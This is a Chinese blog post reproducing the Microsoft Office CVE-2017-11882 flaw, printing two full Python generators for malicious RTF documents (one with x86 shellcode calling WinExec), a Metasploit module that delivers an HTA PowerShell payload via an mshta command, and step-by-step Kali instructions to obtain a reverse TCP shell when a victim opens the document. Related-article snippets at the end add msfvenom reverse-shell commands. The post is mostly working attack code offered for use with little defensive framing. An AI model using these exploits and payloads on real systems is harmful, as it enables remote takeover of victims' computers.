msf生成webshell_CVE-2017-11882漏洞复现结合MSF拿电脑shell

最新推荐文章于 2023-03-22 08:15:24 发布
最新推荐文章于 2023-03-22 08:15:24 发布
阅读量438 收藏
点赞数
文章标签: msf生成webshell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32139875/article/details/112999866
版权

两个代码分别贴上

[Python] 纯文本查看 复制代码import argparse

import sys

RTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}

{\*\generator Riched20 6.3.9600}\viewkind4\uc1

\pard\sa200\sl276\slmult1\f0\fs22\lang9"""

RTF_TRAILER = R"""\par}

"""

OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """

OBJECT_TRAILER = R"""

}{\result {\rtlch\fcs1 \af0 \ltrch\fcs0 \dn8\insrsid95542\charrsid95542 {\pict{\*\picprop\shplid1025{\sp{\sn shapeType}{\sv 75}}{\sp{\sn fFlipH}{\sv 0}}

{\sp{\sn fFlipV}{\sv 0}}{\sp{\sn fLockAspectRatio}{\sv 1}}{\sp{\sn pictureGray}{\sv 0}}{\sp{\sn pictureBiLevel}{\sv 0}}{\sp{\sn fRecolorFillAsPicture}{\sv 0}}{\sp{\sn fUseShapeAnchor}{\sv 0}}{\sp{\sn fFilled}{\sv 0}}{\sp{\sn fHitTestFill}{\sv 1}}

{\sp{\sn fillShape}{\sv 1}}{\sp{\sn fillUseRect}{\sv 0}}{\sp{\sn fNoFillHitTest}{\sv 0}}{\sp{\sn fLine}{\sv 0}}{\sp{\sn fPreferRelativeResize}{\sv 1}}{\sp{\sn fReallyHidden}{\sv 0}}

{\sp{\sn fScriptAnchor}{\sv 0}}{\sp{\sn fFakeMaster}{\sv 0}}{\sp{\sn fCameFromImgDummy}{\sv 0}}{\sp{\sn fLayoutInCell}{\sv 1}}}\picscalex100\picscaley100\piccropl0\piccropr0\piccropt0\piccropb0

\picw353\pich600\picwgoal200\pichgoal340\wmetafile8\bliptag1846300541\blipupi2307{\*\blipuid 6e0c4f7df03da08a8c6c623556e3c652}0100090000035100000000001200000000000500000009020000000005000000020101000000050000000102ffffff00050000002e0118000000050000000b02

00000000050000000c02200240011200000026060f001a00ffffffff000010000000c0ffffffaaffffff00010000ca0100000b00000026060f000c004d61746854797065000040000a00000026060f000a00ffffffff010000000000030000000000}}}}

"""

OBJDATA_TEMPLATE = R"""

01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1

b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001

0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffe

fffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0074007200790000

00000000000000000000000000000000000000000000000000000000000000000000000000000000

00000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000

000000000000008020cea5613cd30103000000000200000000000001004f006c0065000000000000

00000000000000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000a000201ffffffffffffffffffffffff00000000000000000000000000

0000000000000000000000000000000000000000000000000000001400000000000000010043006f

006d0070004f0062006a000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000120002010100000003000000ffffffff0000000000

00000000000000000000000000000000000000000000000000000000000000010000006600000000

00000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000012000201ffffffff04000000ff

ffffff00000000000000000000000000000000000000000000000000000000000000000000000003

0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000fe

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffff01000002080000000000000000000000000000000000000000000000000000000000000000

0000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02

ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e

30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000

00000000000000000000000000000000000000000000000000000000000000000000000000030004

00000000000000000000000000000000000000000000000000000000000000000000000000000000

000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4

ee5b0000000000030101030a0a01085a5a4141414141414141414141414141414141414141414141

414141414141414141414141414141414141414141120c4300000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000004500710075

006100740069006f006e0020004e0061007400690076006500000000000000000000000000000000

0000000000000000000000000000000000000020000200ffffffffffffffffffffffff0000000000

0000000000000000000000000000000000000000000000000000000000000004000000c500000000

00000000000000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000ffffffffffffffffff

ffffff00000000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000000000000

000000000000000000000000000000000000000000000000000000000000000000000000000000ff

ffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000000000000

00000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000001050000050000000d0000004d

45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500

000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00

050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00

ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d617468

54797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e65

7720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a6001

90160a000000313131313131313131310c000000320a6001100f0a00000031313131313131313131

0c000000320a600190070a000000313131313131313131310c000000320a600110000a0000003131

31313131313131310a00000026060f000a00ffffffff0100000000001c000000fb02100007000000

0000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff

7cef1800040000002d01010004000000f0010000030000000000

"""

COMMAND_OFFSET = 0x949*2

def create_ole_exec_primitive(command):

if len(command) > 43:

print "[!] Primitive command must be shorter than 43 bytes"

sys.exit(0)

hex_command = command.encode("hex")

objdata_hex_stream = OBJDATA_TEMPLATE.translate(None, "\r\n")

ole_data = objdata_hex_stream[:COMMAND_OFFSET] + hex_command + objdata_hex_stream[COMMAND_OFFSET + len(hex_command):]

return OBJECT_HEADER + ole_data + OBJECT_TRAILER

def create_rtf(header,command,trailer):

ole1 = create_ole_exec_primitive(command + " &" )

# We need 2 or more commands for executing remote file from WebDAV

# because WebClient service start may take some time

return header + ole1 + trailer

if __name__ == '__main__':

parser = argparse.ArgumentParser(description="PoC for CVE-2017-11882")

parser.add_argument("-c", "--command", help="Command to execute.", required=True)

parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)

args = parser.parse_args()

rtf_content = create_rtf(RTF_HEADER, args.command ,RTF_TRAILER)

output_file = open(args.output, "w")

output_file.write(rtf_content)

print " Done ! output file --> " + args.output

Command109b_CVE-2017-11882

[Python] 纯文本查看 复制代码# Original poc :[url]https://github.com/embedi/CVE-2017-11882[/url]

# This version accepts a command with 109 bytes long in maximum.

# Sorry I don't know how to read the struct in objdata, hence I cannot modify the length parameter to aquire a arbitrary length code execution.

# But that's enough in exploitation. We can use regsvr32 to load sct file remotely.:)

import argparse

import sys

from struct import pack

head=r'''{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}

{\*\generator Riched20 6.3.9600}\viewkind4\uc1

\pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000000000000000008020cea5613cd30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000201ffffffffffffffffffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006f006d0070004f0062006a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004f0062006a0049006e0066006f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000201ffffffff04000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000000000000000000000000000000000000000000000000000000000000000000000000000000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

'''

tail=r'''

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000004000000C5000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000D0000004D45544146494C4550494354003421000035FEFFFF9201000008003421CB010000010009000003C500000002001C00000000000500000009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A600190160A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A000000313131313131313131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F0010000030000000000

}{\result {\rtlch\fcs1 \af0 \ltrch\fcs0 \dn8\insrsid95542\charrsid95542 {\pict{\*\picprop\shplid1025{\sp{\sn shapeType}{\sv 75}}{\sp{\sn fFlipH}{\sv 0}}

{\sp{\sn fFlipV}{\sv 0}}{\sp{\sn fLockAspectRatio}{\sv 1}}{\sp{\sn pictureGray}{\sv 0}}{\sp{\sn pictureBiLevel}{\sv 0}}{\sp{\sn fRecolorFillAsPicture}{\sv 0}}{\sp{\sn fUseShapeAnchor}{\sv 0}}{\sp{\sn fFilled}{\sv 0}}{\sp{\sn fHitTestFill}{\sv 1}}

{\sp{\sn fillShape}{\sv 1}}{\sp{\sn fillUseRect}{\sv 0}}{\sp{\sn fNoFillHitTest}{\sv 0}}{\sp{\sn fLine}{\sv 0}}{\sp{\sn fPreferRelativeResize}{\sv 1}}{\sp{\sn fReallyHidden}{\sv 0}}

{\sp{\sn fScriptAnchor}{\sv 0}}{\sp{\sn fFakeMaster}{\sv 0}}{\sp{\sn fCameFromImgDummy}{\sv 0}}{\sp{\sn fLayoutInCell}{\sv 1}}}\picscalex100\picscaley100\piccropl0\piccropr0\piccropt0\piccropb0

\picw353\pich600\picwgoal200\pichgoal340\wmetafile8\bliptag1846300541\blipupi2307{\*\blipuid 6e0c4f7df03da08a8c6c623556e3c652}0100090000035100000000001200000000000500000009020000000005000000020101000000050000000102ffffff00050000002e0118000000050000000b02

00000000050000000c02200240011200000026060f001a00ffffffff000010000000c0ffffffaaffffff00010000ca0100000b00000026060f000c004d61746854797065000040000a00000026060f000a00ffffffff010000000000030000000000}}}}

\par}

'''

#0: b8 44 eb 71 12 mov eax,0x1271eb44

#5: ba 78 56 34 12 mov edx,0x12345678

#a: 31 d0 xor eax,edx

#c: 8b 08 mov ecx,DWORD PTR [eax]

#e: 8b 09 mov ecx,DWORD PTR [ecx]

#10: 8b 09 mov ecx,DWORD PTR [ecx]

#12: 66 83 c1 3c add cx,0x3c

#16: 31 db xor ebx,ebx

#18: 53 push ebx

#19: 51 push ecx

#1a: be 64 3e 72 12 mov esi,0x12723e64

#1f: 31 d6 xor esi,edx

#21: ff 16 call DWORD PTR [esi] // call WinExec

#23: 53 push ebx

#24: 66 83 ee 4c sub si,0x4c

#28: ff 10 call DWORD PTR [eax] // call ExitProcess

stage1="\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53\x66\x83\xEE\x4C\xFF\x10"

# pads with nop

stage1=stage1.ljust(44,'\x90')

def genrtf(cmd):

if len(cmd) > 109:

print "[!] Primitive command must be shorter than 109 bytes"

sys.exit(0)

payload='\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ'

payload+=stage1

payload+=pack('<I',0x00402114) # ret

payload+='\x00'*2

payload+=cmd

payload=payload.ljust(197,'\x00')

return head+payload.encode('hex')+tail

if __name__ == '__main__':

parser = argparse.ArgumentParser(description="PoC for CVE-2017-11882")

parser.add_argument("-c", "--cmd", help="Command run in target system", required=True)

parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)

args = parser.parse_args()

with open(args.output,'wb') as f:

f.write(genrtf(args.cmd))

f.close()

print " Done ! output file --> " + args.output

8f3ff2fbfdd7c7c8339951a6542705fa.gif

1.png (331.07 KB, 下载次数: 85)

2017-11-26 11:16 上传

8f3ff2fbfdd7c7c8339951a6542705fa.gif

2.png (90.92 KB, 下载次数: 99)

2017-11-26 11:19 上传

效果你们懂的

现在我们需要一个rb脚本来连接我们的MSF   脚本如下

[Ruby] 纯文本查看 复制代码##

# This module requires Metasploit: [url]https://metasploit.com/download[/url]

# Current source: [url]https://github.com/rapid7/metasploit-framework[/url]

##

class MetasploitModule < Msf::Exploit::Remote

Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer

def initialize(info = {})

super(update_info(info,

'Name' => 'Microsoft Office Payload Delivery',

'Description' => %q{

This module generates an command to place within

a word document, that when executed, will retrieve a HTA payload

via HTTP from an web server. Currently have not figured out how

to generate a doc.

},

'License' => MSF_LICENSE,

'Arch' => ARCH_X86,

'Platform' => 'win',

'Targets' =>

[

['Automatic', {} ],

],

'DefaultTarget' => 0,

))

end

def on_request_uri(cli, _request)

print_status("Delivering payload")

p = regenerate_payload(cli)

data = Msf::Util::EXE.to_executable_fmt(

framework,

ARCH_X86,

'win',

p.encoded,

'hta-psh',

{ :arch => ARCH_X86, :platform => 'win '}

)

send_response(cli, data, 'Content-Type' => 'application/hta')

end

def primer

url = get_uri

print_status("Place the following DDE in an MS document:")

print_line("mshta.exe \"#{url}\"")

end

end

首先先把我们的脚本放在KALI  MSF漏洞目录下面路径是

[C] 纯文本查看 复制代码/usr/share/metasploit-framework/modules/exploits/windows/smb/

8f3ff2fbfdd7c7c8339951a6542705fa.gif

3.png (436.73 KB, 下载次数: 104)

2017-11-26 11:31 上传

打开我们的MSF搜索我们的模块。下面直接看我的操作。

8f3ff2fbfdd7c7c8339951a6542705fa.gif

4.png (485.58 KB, 下载次数: 85)

2017-11-26 11:39 上传

使用该模块

8f3ff2fbfdd7c7c8339951a6542705fa.gif

5.png (2.13 MB, 下载次数: 92)

2017-11-26 12:14 上传

设置payload为反弹tcp

8f3ff2fbfdd7c7c8339951a6542705fa.gif

6.jpg (2.14 MB, 下载次数: 78)

2017-11-26 13:47 上传

设置KALI本机ip

8f3ff2fbfdd7c7c8339951a6542705fa.gif

7.jpg (2.15 MB, 下载次数: 95)

2017-11-26 13:48 上传

设置uri的路径,要与第一步生成doc时配置一致

8f3ff2fbfdd7c7c8339951a6542705fa.gif

8.jpg (2.16 MB, 下载次数: 98)

2017-11-26 13:49 上传

检查当前配置

8f3ff2fbfdd7c7c8339951a6542705fa.gif

8.jpg (2.16 MB, 下载次数: 93)

2017-11-26 13:50 上传

启动利用后,msf会监听本机8080端口,如果win7机器打开doc触发访问172.16.253.76:8080/abc就会得到反弹到4444端口的tcp会话

我们生成doc文件打开

8f3ff2fbfdd7c7c8339951a6542705fa.gif

9.jpg (159.28 KB, 下载次数: 94)

2017-11-26 13:50 上传

收到反弹tcp连接

8f3ff2fbfdd7c7c8339951a6542705fa.gif

10.jpg (941.41 KB, 下载次数: 83)

2017-11-26 13:52 上传

chinhoyoo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2017-7921海康威视配置文件解码(configfile解码)
12-11
具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。(ps:工具不会使用可以私信我,直接差评的一律自理)
[内网基础]msf使用&内网实战演示
_DESpiSED的博客
11-14 1093
本文结合msfconsole和相关工具进行内网渗透实战演示,希望给大家一些思路。
msf生成webshell_Metasploit 之使用socket通信的webshell简单分析
weixin_39693193的博客
12-22 320
Metasploit 之使用socket通信的webshell简单分析upload (Van Helsing) | 2013-01-08 21:530x01 前言常规的webshell都是调用该语言中常用函数来完成读取、执行等操作,从协议上来讲是采用http/https协议。但是和服务器通信还有另外一种方式:socket通信。常见的脚本语言asp,php,jsp,都可以实现对应的socket编程...
msf生成webshell_MSFWeb渗透
weixin_36212560的博客
01-13 794
WebShellroot@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.80.163 LPORT=3333 -f raw -o a.php 生成a.phpmsf > use exploit/multi/handlermsf exploit(handler) > set payload php/meterpr...
msf生成webshell_msfwebshell 提权
weixin_39623411的博客
12-22 343
首先建议一下到网上查查meterpreter的用法在看这篇文章,理解为什么要使用msf来提权(因为msf里边有个meterpreter很强大 ^_^)Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产...
msf生成webshell_生成常用的msf
weixin_39759441的博客
12-22 678
msf作为一款强大的漏洞检测工具,如何生成适用于msf的payload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。在kali下可以使用如下命令列出MSFVenom可以生成的payload列表:msfvenom -l生成二进制文件关于二进制文件,主要介绍适用于Windows、linux、ma...
CiscoIOSSNMPToolkit:Cisco iOS SNMP溢出漏洞利用工具包(CVE-2017-6736)
05-10
CiscoIOSSNMP工具包 Cisco iOS SNMP溢出漏洞利用工具包(CVE-2017-6736) CVE-2018-0296? 我最近修改了CVE-2018-0296,可与该原始漏洞利用结合使用,可用于进行侦察并事先查看设备中包含的内容。
MSF_EXPLOIT-WINDOWS-FILEFORMAT-WINRAR_CVE_2023_38831-.txt
最新发布
09-10
MSF_EXPLOIT-WINDOWS-FILEFORMAT-WINRAR_CVE_2023_38831-.txt
CVE-2018-8174-msf:CVE-2018-8174-VBScript内存损坏漏洞利用
05-17
CVE-2018-8174-MSF 这是一个metasploit模块,该模块创建恶意的Word文档以利用CVE-2018-8174-VBScript内存损坏漏洞。 该模块是一个非常快速的端口,并使用在野外发现的漏洞利用示例。 该漏洞仅适用于32位Microsoft ...
rtk_sensor_damagezfw_rtk_ROS_gpsrtkros_msf-ekf_
09-30
ros RTK驱动,可用于ROS开发,需要建立ROS工作空间
MSF-从webshell到完全控制
scrawman的博客
01-18 831
文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import
kali攻防第13章 Metasploit之生成webshell及应用
安全参透之旅
12-24 6322
Metasploit之生成webshell及应用   准备工具 1、kali 系统 IP 10.10.10.131 2、受害者机子 IP 10.10.10.130 3、使用工具 Metasploit   步骤:   1、在msf生成asp脚本木马 root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.
webshell管理工具-冰蝎(Behinder)的安装和基础使用(msf联动,流量特征)
黄乔国PHP
03-22 7471
冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量被加密,传统的WAF、IDS 设备难以检测,给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密,且加密密钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测。在流量层,冰蝎的aes特征一直是厂商查杀的重点,在主机层,aes相关的API也是一个强特征。既然是特征,那就一定存在一个一成不变的常量,那我们就把这个特征泛化一下,让他成为变量。为了一劳永逸解决这个问题,
weevely混淆webshell联动msf
灰太的表格的博客
06-15 486
weevely混淆webshell的联合msf 生成 可以看到有两个参数,分别对应着进行混淆的两种方式。我们分别来试一下 整理一下代码稍后分析下混淆过程: 利用 将混淆后的webshell进行上传,并进行连接,会传回一个交互式的shell 常用命令: :audit_disablefunctionbypass Bypass disable_function restrictions with mod_cgi and .htaccess. :audit_etcpasswd
RTF文本格式解析-西班牙语乱码问题
Seazhouyang的专栏
10-27 3447
RTF具体格式讲解不细说(可参考一篇转载的帖子)。
Office 远程代码执行漏洞复现过程
技术杂谈
03-30 2918
本文来自作者 肖志华 在 GitChat 上分享 「Office 远程代码执行漏洞复现过程」,「阅读原文」查看交流实录。编辑 | 天津饭直接贴本地复现过程,至于怎么利用还请自己思考。2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的 Office 远程代码执行漏洞CVE-2017-11882)。该漏洞为 Office 内存破坏漏洞,影响目
java程序拦截dde漏洞问题_被微软忽略的Office DDE漏洞已经开始遭到利用(含POC)...
weixin_34380880的博客
03-01 257
### This module requires Metasploit: https://metasploit.com/download##class MetasploitModule < Msf::Exploit::RemoteRank = ManualRankinginclude Msf::Exploit::Remote::HttpServerinclude Msf::Exploit:...
CRichEditDoc下保存文档出现\rtf1\ansi\ansicpg936\deff0的解决方法
Wolf的专栏
09-20 3617
使用CFile对象在CRichEdit模块中保存文件,结果每次保存的文件都会变为RTF格式,在文档中会加上一串   \rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0\fswiss\fcharset0 Arial;的代码,找了许久都没找到在哪修改保存文档的格式,最终在Serialize(CArchive& ar)函数
msf win10漏洞_永恒之黑:CVE20200796漏洞复现
05-28
